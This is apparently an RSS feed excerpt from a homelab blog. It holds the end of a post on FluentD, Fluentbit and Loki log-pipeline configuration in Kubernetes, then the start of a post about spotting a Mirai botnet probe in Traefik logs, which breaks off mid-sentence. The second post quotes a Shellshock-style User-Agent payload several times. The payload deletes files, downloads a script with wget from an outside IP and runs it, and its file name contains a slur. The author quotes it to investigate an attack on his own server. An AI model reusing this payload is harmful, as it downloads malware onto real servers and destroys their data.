I was able to see that the host field was set properly. An example message
looked like this:</p>
<pre tabindex="0"><code>&lt;30&gt;1 2024-01-29T22:16:56+01:00 khepri.home kubelet 19562 - - W0129 22:16:56.971140   19562 machine.go:65] Cannot read vendor id correctly, set empty.
</code></pre><p>And this host field, <code>khepri.home</code> here, should be used by default. But it wasn&rsquo;t,
due to having this option set:</p>
<pre tabindex="0"><code>source_hostname_key host
</code></pre><p>This makes FluentD go out to DNS, instead of just using the host field from the
message. Ah well, it had been almost two weeks since I last had to get out
Wireshark anyway. &#x1f612;</p>
<p>Last but most certainly not least was a problem with OPNsense. I had reconfigured
the logging target to the new domain, but nothing happened. No proper log entries,
nothing.
Turns out, after an hour or so of debugging: OPNsense&rsquo;s syslog-ng needed a full
restart, not just a config reload, to start using the new values. &#x1f926;</p>
<h2 id="fluentd-configs">FluentD configs</h2>
<p>Before moving on to Fluentbit and the k8s logs, I want to at least have a short
look at my FluentD base config and the syslog configs.</p>
<p>My main config file for FluentD looks like this:</p>
<pre tabindex="0"><code>&lt;system&gt;
  log_level info
&lt;/system&gt;
# Fluentd&#39;s own logs
# This is only intended to prepare the logs for forwarding
# to the services loki instance!
&lt;label @FLUENT_LOG&gt;
	&lt;match fluent.**&gt;
		@type record_modifier
		@label @K8S
		tag services.fluentd.fluentd
		&lt;record&gt;
          namespace_name fluentd
          container_name fluentd
          host &#34;#{ENV[&#39;HL_NODE_NAME&#39;]}&#34;
          level ${tag_parts[1]}
		&lt;/record&gt;
	&lt;/match&gt;
&lt;/label&gt;

# Healthcheck endpoint
&lt;source&gt;
  @type http_healthcheck
  port {{ .Values.ports.health }}
  bind 0.0.0.0
&lt;/source&gt;

# Syslog Handling
@include syslogs.conf

# Service logs coming from the Nomad jobs
@include nomad-srv-logs.conf

# k8s logs
@include k8s.conf
</code></pre><p>The main part is the configuration of FluentD&rsquo;s own logs. With this config,
they&rsquo;re still put to <code>stdout</code>, but they&rsquo;re also forwarded to my <code>K8S</code> label.
I will show that later. Now that I look at the config, it might be interesting
to see whether I could also provide the namespace and container name as ENV
variables and set the record content from those, instead of hardcoding them
here.</p>
<p>In the <code>syslogs.conf</code> file, I&rsquo;m setting up the syslog handling:</p>
<pre tabindex="0"><code>&lt;source&gt;
	@type syslog
	port {{ .Values.ports.syslogTls }}
	bind 0.0.0.0
	tag syslogs.new
  severity_key level
	frame_type octet_count
	&lt;transport tcp&gt;
	&lt;/transport&gt;
	&lt;parse&gt;
		message_format auto
	&lt;/parse&gt;
&lt;/source&gt;

&lt;filter syslogs.new.**&gt;
  @type grep
  &lt;exclude&gt;
    key message
    pattern /^.* too long to fit into unit name, ignoring mount point\.$/
  &lt;/exclude&gt;
&lt;/filter&gt;

&lt;match syslogs.**&gt;
  @type route
  &lt;route syslogs.**&gt;
    @label @SYSLOGS
    copy
  &lt;/route&gt;
&lt;/match&gt;

&lt;label @SYSLOGS&gt;
  &lt;match syslogs.**&gt;
    @type loki
    url &#34;http://loki.loki.svc.cluster.local:3100&#34;
    extra_labels {&#34;job&#34;:&#34;syslogs&#34;}
    &lt;label&gt;
      host $.host
    &lt;/label&gt;
    &lt;buffer host&gt;
      path /fluentd/log/buffers/loki.syslog.*.buffer
      @type file
      total_limit_size 5GB
      flush_at_shutdown true
      flush_mode interval
      flush_interval 5s
      chunk_limit_size 5MB
    &lt;/buffer&gt;
  &lt;/match&gt;
&lt;/label&gt;
</code></pre><p>I have removed some content here, as a lot of it is repetitive code for
the different ports I need to listen on for the different syslog formats and
transports.</p>
<p>The <code>&lt;source&gt;</code> will listen on the <code>syslogTLS</code> port for incoming syslog messages
and tag them properly. The parsing, luckily, can be automated as FluentD has
the ability to automatically detect whether it&rsquo;s an RFC3164 or a RFC5424 formatted
message.</p>
<p>In the <code>@type grep</code> filter, I&rsquo;m dropping one specific log line, looking like this:</p>
<pre tabindex="0"><code>Mount point path &#39;/var/lib/kubelet/plugins/kubernetes.io/csi/rook-ceph.rbd.csi.ceph.com/7fa64edb6fced4ed6d5acd3643506bc6a3ea6bea547f6a6c2997653e203f4857/globalmount/0001-...too long to fit into unit name, ignoring mount point
</code></pre><p>These incredibly annoying lines are send by systemd, with <code>warning</code> severity.
See e.g. <a href="https://github.com/docker/for-linux/issues/679">this docker bug report</a>.
These messages also come up on my Nomad cluster, for the same reason, CSI mounts.
But from the GitHub issue it seems like there&rsquo;s now a way in systemd to do
this? Anyway, for now I&rsquo;m filtering in FluentD to not have the endless repeats
of that line every 10 seconds pollute my logs.</p>
<p>Finally, I&rsquo;m using the <code>SYSLOGS</code> label. Labels in FluentD are something like
subtrees in the log pipeline. By default, every log record flows from the point
where its <code>&lt;source&gt;</code> is until it hits a <code>&lt;match&gt;</code> section which fits its tag.
With labels, subsections combining several <code>&lt;filter&gt;</code> and <code>&lt;match&gt;</code> sections
can be created.</p>
<p>In this particular example, nothing special done, just the
match section for the Loki output plugin. I&rsquo;m setting the URL of the internal
Loki service. The <code>&lt;label&gt;</code> section defines which Loki labels are set for the
log entry. Labels are Loki&rsquo;s index. It can search over the entirety of a log
entry, but the labels are more efficient, especially with separate log sources
like I have here, with container logs and host logs. For this I&rsquo;m setting the
<code>job</code> label, <code>syslogs</code> here. In addition, any given syslog stream is also
identified uniquely by the host which emitted the log, which is why I&rsquo;m adding
the host field as another label. All other fields in the record, like the syslog
ident, will also be stored in Loki of course, but they will simply be part of
the log line, and will not be indexed.</p>
<p>I&rsquo;m also setting up some local buffering, again with the host key as the buffer
key. I&rsquo;m giving the buffer a rather generous 5GB of max size, just to make sure
I don&rsquo;t run out of space for logs if something goes down during the night and
subsequent workday.</p>
<h1 id="fluentbit-setup">Fluentbit setup</h1>
<p>Final component of the logging setup: <a href="https://fluentbit.io/">Fluentbit</a>.
There&rsquo;s quite a large choice of log shippers. I ended up deciding on Fluentbit
because I was already running FluentD at the point where I wanted per-host
log shippers.</p>
<p>As I had mentioned in the overview, Fluentbit is mostly a dump log shipper for me,
its config is kept pretty simple, letting FluentD do the heavy lifting. For
that reason, I was finally able to use an official Helm chart in this migration.
Fluentbit&rsquo;s can be found <a href="https://github.com/fluent/helm-charts/tree/main/charts/fluent-bit">here</a>.</p>
<p>The general part of the <code>values.yaml</code> looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">testFramework</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">effect</span>: <span style="color:#ae81ff">NoSchedule</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">key</span>: <span style="color:#ae81ff">node-role.kubernetes.io/control-plane</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">Exists</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">fluentbit</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">fluentbit</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">priorityClassName</span>: <span style="color:#e6db74">&#34;system-node-critical&#34;</span>
</span></span></code></pre></div><p>Only noteworthy part is setting the tolerations, so that Fluentbit is also
deployed on control plane nodes and, in my case, Ceph nodes. I&rsquo;ve also decided
to declare it node-critical, to prevent eviction.</p>
<p>More interesting than that is the <code>config:</code> section:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">inputs</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    [INPUT]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Name tail
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Path /var/log/containers/*.log
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        multiline.parser cri
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Tag kube.*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Mem_Buf_Limit 5MB</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">filters</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    [FILTER]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Name kubernetes
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Match kube.*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Merge_Log On
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Keep_Log Off
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        K8S-Logging.Parser On
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        K8S-Logging.Exclude On
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Annotations off
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    [FILTER]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Name nest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Match kube.*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Operation lift
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Nested_under kubernetes
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    [FILTER]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Name    modify
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Match   kube.*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Remove pod_id
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Remove docker_id
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Remove container_hash
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Remove container_image
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    [FILTER]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Name    grep
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Match   kube.*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Exclude namespace_name fluentd</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">outputs</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    [OUTPUT]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Name          forward
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Match         *
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Tag           services.$namespace_name.$container_name
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Host          fluentd.fluentd.svc.cluster.local
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Port          24230
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Retry_Limit   50</span>
</span></span></code></pre></div><p>At the top is the <a href="https://docs.fluentbit.io/manual/pipeline/inputs/tail">tail input</a>.
It reads all the log files in <code>/var/log/containers</code>, which is mounted into the
Fluentbit container from the host. I&rsquo;ve set the parser to <code>cri</code>, as that&rsquo;s the
format cri-o writes.</p>
<p>The first and most interesting filter is <a href="https://docs.fluentbit.io/manual/pipeline/filters/kubernetes">Kubernetes</a>.
This plugin first extracts some data from the tag, namely the namespace, Pod name,
container name and container id. This is taken from the filename by the tail
plugin. A log file for a cilium pod would look like this:
<code>cilium-tmlqp_kube-system_cilium-agent-eb472a8bae2b95836acc51f70986c7bd2f659f0d69e4aff8b9f9fa80fef5d565.log</code>.
Where <code>cilium-tmlqp</code> is the Pod name, <code>kube-system</code> the Namespace, <code>cilium-agent</code>
the container name and finally the uuid is the container ID.</p>
<p>But the Kubernetes filter can extract additional data, by contacting the
kube-apiserver. These are the Pod ID, labels and annotations. In my config, I&rsquo;ve
disabled the annotations, because I don&rsquo;t find them too interesting in logging.
The labels, on the other hand, might come in handy.
One important thing to note about the Kubernetes filter: It needs to get this
additional data from the kube-apiserver. There&rsquo;s some caching, and I&rsquo;ve not found
any increased load on my kube-apiserver. But depending on how busy a cluster is,
meaning how many new pods appear in any given timeframe, the load on the kube-apiserver
might go pretty high.</p>
<p>The Kubernetes filter puts all of the keys it adds under a <code>kubernetes</code> key. I
don&rsquo;t find that particularly useful. That&rsquo;s why I raise all keys under <code>kubernetes</code>
by one level with the <code>nest</code> filter.</p>
<p>With the <code>modify</code> filter I&rsquo;m also removing some pieces of the log info I deem
superfluous in my log records.</p>
<p>The final filter, <code>grep</code>, is immensely important for a stable and useful
FluentD+Fluentbit setup. Imagine the following scenario: For debugging purposes,
you use FluentD&rsquo;s <a href="https://docs.fluentd.org/filter/stdout">stdout filter</a>, which
does nothing else than writing an entire log record to the stdout of the FluentD
container. Now, if we were collecting the FluentD log file and feeding it back
into FluentD, that would also then be output on stdout again - ad infinitum.
This is the end result:
<figure>
    <img loading="lazy" src="fluentd-log-loop.png"
         alt="A screenshot of a terminal, completely filled with &#39;/&#39;. Nothing else. No, really. I&#39;m not being lazy here. Just an entire terminal, filled with &#39;/&#39;."/> <figcaption>
            <p>An endless loop.</p>
        </figcaption>
</figure>

And of course, I&rsquo;ve got a screenshot of it. This has happened to me every single
time I have set up FluentD.
But this doesn&rsquo;t mean that we can&rsquo;t have FluentD logs. I will explain how that
works without risking an endless loop in the next section.</p>
<p>The OUTPUT part then transfers the logs to FluentD. I&rsquo;m setting the tag as the
Namespace name and the container name. These make the most sense as identifiers
from the data I have. I would have loved to also add the Pod name as another
key, but this has a problem: The Pod name as provided might have some hashes
attached. E.g. for the Cilium pod example from before, the Pod name would be
<code>cilium-tmlqp</code>. This hash changes when the Pod spec changes. While this is a
good idea to uniquely identify Pods, it isn&rsquo;t too useful for logs. Because
generally speaking, when looking at logs, I&rsquo;m interested in the logs for a
specific app, not (necessarily?) of a specific Pod from that app.
In addition, these unique identifiers also later form the labels for Loki, and
labels with too high cardinality are bad for Loki&rsquo;s performance.</p>
<h1 id="setting-up-k8s-component-logs">Setting up k8s component logs</h1>
<p>Before finishing up, I would also like to show what my k8s log handling looks
like in FluentD. As described above, the logs from the k8s containers arrive
in FluentD via the Forward protocol. The tag defined in the Fluentbit OUTPUT
section arrives untouched in the following <code>&lt;source&gt;</code>:</p>
<pre tabindex="0"><code>&lt;source&gt;
  @type forward
  port {{ .Values.ports.k8sLogs }}
  bind 0.0.0.0
  @label @K8S
&lt;/source&gt;
</code></pre><p>This source just ensures that all log records are routed to the <code>K8S</code> label.
A log, when it arrives at FluentD, looks like this:</p>
<pre tabindex="0"><code>time=&gt;&#34;2024-02-12T18:44:35.624186596+01:00&#34;,
stream=&gt;&#34;stderr&#34;,
_p=&gt;&#34;F&#34;,
log=&gt;&#34;2024-02-12 17:44:35.624124 I | sys: Device found - mmcblk0boot1&#34;,
pod_name=&gt;&#34;rook-discover-d9tcf&#34;,
namespace_name=&gt;&#34;rook-ceph&#34;,
labels=&gt;{
  app=&gt;&#34;rook-discover&#34;,
  app.kubernetes.io/component=&gt;&#34;rook-discover&#34;,
  app.kubernetes.io/created-by=&gt;&#34;rook-ceph-operator&#34;,
  app.kubernetes.io/instance=&gt;&#34;rook-discover&#34;,
  app.kubernetes.io/managed-by=&gt;&#34;rook-ceph-operator&#34;,
  app.kubernetes.io/name=&gt;&#34;rook-discover&#34;,
  app.kubernetes.io/part-of=&gt;&#34;rook-ceph-operator&#34;,
  controller-revision-hash=&gt;&#34;799f867d7&#34;,
  pod-template-generation=&gt;&#34;3&#34;,
  rook.io/operator-namespace=&gt;&#34;rook-ceph&#34;
},
host=&gt;&#34;khepri&#34;,
container_name=&gt;&#34;rook-discover&#34;
</code></pre><p>The only thing I&rsquo;m touching in FluentD is the <code>log</code> key. My goal is to extract
two pieces of information from it: First and foremost, the severity level of the
log. And let me tell you: This is <em>wild</em>. Because not only can the tech industry
not agree on a log format - no, it can&rsquo;t even agree on universal identifiers
for different log levels!</p>
<p>To extract the proper log line, I have separate <a href="https://docs.fluentd.org/filter/parser">Parser filters</a>
in my config, for each individual app. Because yes, it&rsquo;s the Wild West out there
when it comes to logging formats. Even <em>within the same app</em>! &#x1f620;</p>
<p>The above example is from a Ceph container. It would be parsed by this
config:</p>
<pre tabindex="0"><code>&lt;filter services.{rook-cluster,rook-ceph}.{watch-active,provision,rook-ceph-operator,rook-discover}&gt;
  @type parser
  key_name log
  reserve_data true
  remove_key_name_field true
  &lt;parse&gt;
    @type multi_format
    &lt;pattern&gt;
      format regexp
      expression /^(?&lt;logtime&gt;[0-9\-]+ [0-9\:\.]+) (?&lt;level&gt;[^ ]+) \| (?&lt;cmd&gt;[^:]+)\: (?&lt;msg&gt;.*)$/
      time_key logtime
      time_format %F %T.%N
      utc true
    &lt;/pattern&gt;
    &lt;pattern&gt;
      format regexp
      expression /^(?&lt;msg&gt;.*)$/
      time_key nil
    &lt;/pattern&gt;
  &lt;/parse&gt;
&lt;/filter&gt;
</code></pre><p>As you can see, this format is used by a number of other Ceph containers as well.
But you can also see: Besides these well-formatted lines, there are also others
which defy any formatting and hence just get a generic <code>.*</code> regex. And don&rsquo;t
be fooled: There are five other sections just like this one, just to parse logs
from all the Ceph Rook containers running in my cluster.</p>
<p>So what&rsquo;s happening here, exactly? First of all, there&rsquo;s the tag capture at the
top. This determines which logs are handled by this filter. In my logs, the
tags have the format <code>services.NAMESPACE.CONTAINER</code>. The <code>key_name</code> provides
the record key the parser should look at. <code>reserve_data true</code> tells the parser
to leave all other fields in the record, untouched. <code>remove_key_name_field true</code>
says that the parser should remove the <code>log</code> field from the record when parsing
was successful. If parsing fails, the record is left completely untouched.
I&rsquo;m using a multi_format parser here, as the containers spit out logs in
multiple formats. Then, I chose the <code>regexp</code> parser and provide a regex to
parse the <code>log</code> content.
I can very warmly recommend <a href="https://regex101.com">https://regex101.com</a>. It has
served me very well, both during this migration, and ever since I&rsquo;ve started
using FluentD in the Homelab.
One note on the named capture groups in the regexes: Those are transformed into
additional keys in the record.
Then there&rsquo;s the time handling. As whatever log lib the Ceph containers are using
here is too cool to use <a href="https://en.wikipedia.org/wiki/ISO_8601">ISO8601</a>, I
need to not only specify in which key the time can be found, but also need to
define a format.
This can also be skipped, as seen in the second <code>pattern</code> section. In this case,
the time the record was originally received by Fluentbit is used.</p>
<p>Now, back to defining log levels. Here&rsquo;s the config I use to align to a single
identifier for each log level:</p>
<pre tabindex="0"><code>&lt;filter parsed.services.**&gt;
  @type record_modifier

  &lt;replace&gt;
      key level
      expression /^(crit|CRIT|ALERT|alert|4)$/
      replace critical
  &lt;/replace&gt;
  &lt;replace&gt;
      key level
      expression /^(ERROR|eror|ERR|err|E|3)$/
      replace error
  &lt;/replace&gt;
  &lt;replace&gt;
      key level
      expression /^(DEBUG|dbg|DBG|0|\.|\-)$/
      replace debug
  &lt;/replace&gt;
  &lt;replace&gt;
      key level
      expression /^(INFO|Info|INF|inf|I|NOTICE|1|\*)$/
      replace info
  &lt;/replace&gt;
  &lt;replace&gt;
      key level
      expression /^(WARN|warn|WRN|wrn|W|WARNING|2|\#)$/
      replace warning
  &lt;/replace&gt;
&lt;/filter&gt;
</code></pre><p>Note, in particular, the <code>./-/*/#</code>. That&rsquo;s Redis&rsquo; wild way of defining log
severity. See also <a href="https://build47.com/redis-log-format-levels/">this blog post</a>.</p>
<p>Why? Why can&rsquo;t we define one format? I&rsquo;m not asking for a unified log format
at this point. But perhaps - perhaps we can at least have unified identifiers
for the levels?
And also, please: Every single log line should have a severity attached. That&rsquo;s
just basic, good engineering.</p>
<p>One last thing to consider: How to find out whether a log line slipped through
unparsed? For this, I&rsquo;m employing a <a href="https://docs.fluentd.org/output/rewrite_tag_filter">rewrite_tag_filter</a>:</p>
<pre tabindex="0"><code>&lt;match services.**&gt;
  @type rewrite_tag_filter
  &lt;rule&gt;
    key log
    pattern /^.+$/
    tag unparsed.${tag}
  &lt;/rule&gt;
  &lt;rule&gt;
    key log
    pattern /^.+$/
    tag parsed.${tag}
    invert true
  &lt;/rule&gt;
&lt;/match&gt;
</code></pre><p>This filter comes after all the different <code>parser</code> filters. So when, at this
point, a log record still has the <code>log</code> key, it means none of the <code>parser</code>
filters was applied to it. These then get <code>unparsed</code> added to their tag.
There is one important point about <code>rewrite_tag_filter</code>: It re-emits the log
record. So the record runs through the entire chain of filters again. This
can easily lead to an endless chain. Imagine I only added the <code>unparsed</code> tag
to unparsed logs, but left parsed logs completely untouched, instead of
prepending them with the <code>parsed</code> tag. Then, the parsed tags would start the
filter chain again, completely unchanged - and run into this <code>rewrite_tag_filter</code>
again! And then again. And again. Producing a nice endless loop. So when using
a <code>rewrite_tag_filter</code>, always remember to make sure that you change the tags
on <em>all</em> log lines which might hit them.</p>
<p>These <code>unparsed</code> records then go into a <a href="https://docs.fluentd.org/filter/record_transformer">record_transformer</a>
filter:</p>
<pre tabindex="0"><code>  &lt;filter unparsed.**&gt;
    @type record_transformer
    enable_ruby true
    renew_record true
    &lt;record&gt;
      unparsed-log ${record}
      namespace_name hl-dummy
      container_name hl-unparsed-logs
      fluentd-tag ${tag}
      level warn
    &lt;/record&gt;
  &lt;/filter&gt;
</code></pre><p>Here I&rsquo;m putting the entire unparsed log into a subkey <code>unparsed-log</code>. This
also shows off the flexibility of FluentD in manipulating log records. I&rsquo;m also
adding a hardcoded namespace and container name. As those two keys are later
used by Loki to index logs. I&rsquo;m also using them in Grafana for filtering.
And so with this setup, I just need to look at the <code>hl-dummy/hl-unparsed-logs</code>
logs to see whether there&rsquo;s some new logs, or whether perhaps an older regex
needs adaption to a newer format.</p>
<p>And finally, just for completeness&rsquo; sake, the output to Loki:</p>
<pre tabindex="0"><code>&lt;match {parsed,unparsed}.services.**&gt;
    @type loki
    url &#34;http://loki.loki.svc.cluster.local:3100&#34;
    extra_labels {&#34;job&#34;:&#34;k8s-logs&#34;}
    &lt;label&gt;
        namespace $[&#34;namespace_name&#34;]
        container $[&#34;container_name&#34;]
    &lt;/label&gt;
    &lt;buffer namespace_name,container_name&gt;
        path /fluentd/log/buffers/loki.k8s.*.buffer
        @include loki-buffers.conf
    &lt;/buffer&gt;
&lt;/match&gt;
</code></pre><p>The <code>loki-buffers.conf</code> file has the same content as in the syslog example
above.</p>
<h1 id="conclusion">Conclusion</h1>
<p>And that&rsquo;s it! My logging stack, completely migrated to k8s. This was the first
service I actually migrated, and where I could remove jobs from Nomad, namely
the FluentD and Loki jobs. It is now only running its own Fluentbit job, which
transfers the logs to the FluentD instance running on k8s.</p>
<p>One thing I&rsquo;ve noted for the future: Start actively monitoring the logs.
I had a slightly panicky Sunday morning due to some malicious bash code showing
up in my logs when I went to check whether everything had worked.
<a href="https://blog.mei-home.net/posts/sunday-morning-panic/">Read all about it.</a>
I just so happened to see that log because it happened to be at the very top
when I opened my logging dashboard. Otherwise, I would have completely overlooked
it.</p>
<p>The last thing to do for this migration is to have a look at the unparsed logs
in a week or so and make sure I haven&rsquo;t forgotten anything.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Sunday Morning Panic</title>
      <link>https://blog.mei-home.net/posts/sunday-morning-panic/</link>
      <pubDate>Sun, 11 Feb 2024 11:37:46 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/sunday-morning-panic/</guid>
      <description>My laziness caught up with me</description>
      <content:encoded><![CDATA[<p>I just had a slight Sunday morning panic. I finished my logging setup yesterday
night, and had a look at my FluentD logs this morning to see whether I got any
errors or unparsed logs.</p>
<p>At the very top of the logs, I got this entry:</p>
<pre tabindex="0"><code>error=&#34;#&lt;Fluent::Plugin::Parser::ParserError: pattern not matched with data
&#39;{ :; }; echo ; /bin/bash -c &#39;rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh&#39;\&#34;,
\&#34;time\&#34;:\&#34;2024-02-11T04:54:25+01:00\&#34;}&#39;&gt;&#34;
location=
tag=services.traefik.traefik.docker.anon
time=1707623665
record=&#34;{
    \&#34;log\&#34;=&gt;\&#34;{ :; }; echo ; /bin/bash -c &#39;rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh&#39;\\\&#34;,
    \\\&#34;time\\\&#34;:\\\&#34;2024-02-11T04:54:25+01:00\\\&#34;
    }\&#34;,
\&#34;logsubstream\&#34;=&gt;\&#34;docker\&#34;,
\&#34;nomad_job_id\&#34;=&gt;\&#34;traefik\&#34;,
\&#34;nomad_task_name\&#34;=&gt;\&#34;traefik\&#34;,
\&#34;nomad_node_name\&#34;=&gt;\&#34;anon\&#34;}&#34;
message=&#34;dump an error event: error_class=Fluent::Plugin::Parser::ParserError
error=\&#34;pattern not matched with data &#39;{ :; }; echo ; /bin/bash -c &#39;rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh&#39;\\\&#34;,
\\\&#34;time\\\&#34;:\\\&#34;2024-02-11T04:54:25+01:00\\\&#34;}&#39;\&#34;
location=nil
tag=\&#34;services.traefik.traefik.docker.anon\&#34;
time=2024-02-11 03:54:25.149520221 +0000
record={\&#34;log\&#34;=&gt;\&#34;{ :; }; echo ; /bin/bash -c &#39;rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh&#39;\\\&#34;,
\\\&#34;time\\\&#34;:\\\&#34;2024-02-11T04:54:25+01:00\\\&#34;}\&#34;,
\&#34;logsubstream\&#34;=&gt;\&#34;docker\&#34;,
\&#34;nomad_job_id\&#34;=&gt;\&#34;traefik\&#34;,
\&#34;nomad_task_name\&#34;=&gt;\&#34;traefik\&#34;,
\&#34;nomad_node_name\&#34;=&gt;\&#34;anon\&#34;}&#34;
host=anon level=warning
</code></pre><p>That looked suspicious, to say the least. After some googling for the <code>nigga.sh</code>
file, I landed on <a href="https://www.akamai.com/blog/security-research/new-rce-botnet-spreads-mirai-via-zero-days">this page from Akamai</a>.
I describes an attack by the Mirai botnet.</p>
<p>What mostly got me into a panic was that this didn&rsquo;t look like a normal Traefik
access log line. A lot of weird stuff is tried. Instead, the log line in the
Traefik log from Loki looked like this:</p>
<pre tabindex="0"><code>log=&#34;{ :; }; echo ; /bin/bash -c &#39;rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh&#39;\&#34;,\&#34;time\&#34;:\&#34;2024-02-11T04:54:25+01:00\&#34;}&#34; nomad_node_name=anon level=NA
</code></pre><p>So it looked like a normal log entry, not coming from Traefik itself, but still
from the Traefik container. I was already running through some &ldquo;Nuke it all&rdquo;
scenarios in my head.</p>
<p>Then I looked at the Traefik log file itself and relaxed a little bit, as this
showed just a normal Traefik log, with the malicious bash code in the User Agent:</p>
<pre tabindex="0"><code>2024-02-11T04:54:25.148844046+01:00 stdout F {
&#34;ClientAddr&#34;:&#34;185.224.128.10:60474&#34;,
&#34;ClientHost&#34;:&#34;185.224.128.10&#34;,
&#34;ClientPort&#34;:&#34;60474&#34;,
&#34;ClientUsername&#34;:&#34;-&#34;,
&#34;DownstreamContentSize&#34;:19,
&#34;DownstreamStatus&#34;:404,
&#34;Duration&#34;:245663,
&#34;GzipRatio&#34;:0,
&#34;OriginContentSize&#34;:0,
&#34;OriginDuration&#34;:0,
&#34;OriginStatus&#34;:0,
&#34;Overhead&#34;:245663,
&#34;RequestAddr&#34;:&#34;300.300.300.300&#34;,
&#34;RequestContentSize&#34;:0,
&#34;RequestCount&#34;:439872,
&#34;RequestHost&#34;:&#34;300.300.300.300&#34;,
&#34;RequestMethod&#34;:&#34;GET&#34;,
&#34;RequestPath&#34;:&#34;/cgi-bin/jarrewrite.sh&#34;,
&#34;RequestPort&#34;:&#34;-&#34;,&#34;RequestProtocol&#34;:&#34;HTTP/1.1&#34;,
&#34;RequestScheme&#34;:&#34;https&#34;,
&#34;RetryAttempts&#34;:0,
&#34;StartLocal&#34;:&#34;2024-02-11T04:54:25.148079151+01:00&#34;,
&#34;StartUTC&#34;:&#34;2024-02-11T03:54:25.148079151Z&#34;,
&#34;TLSCipher&#34;:&#34;TLS_CHACHA20_POLY1305_SHA256&#34;,
&#34;TLSVersion&#34;:&#34;1.3&#34;,
&#34;entryPointName&#34;:&#34;foo&#34;,
&#34;level&#34;:&#34;info&#34;,
&#34;msg&#34;:&#34;&#34;,
&#34;request_User-Agent&#34;:&#34;() { :; }; echo ; /bin/bash -c &#39;rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh&#39;&#34;,
&#34;time&#34;:&#34;2024-02-11T04:54:2 5+01:00&#34;
}
</code></pre><p>This made a lot more sense to me and was way less scary. But there was still
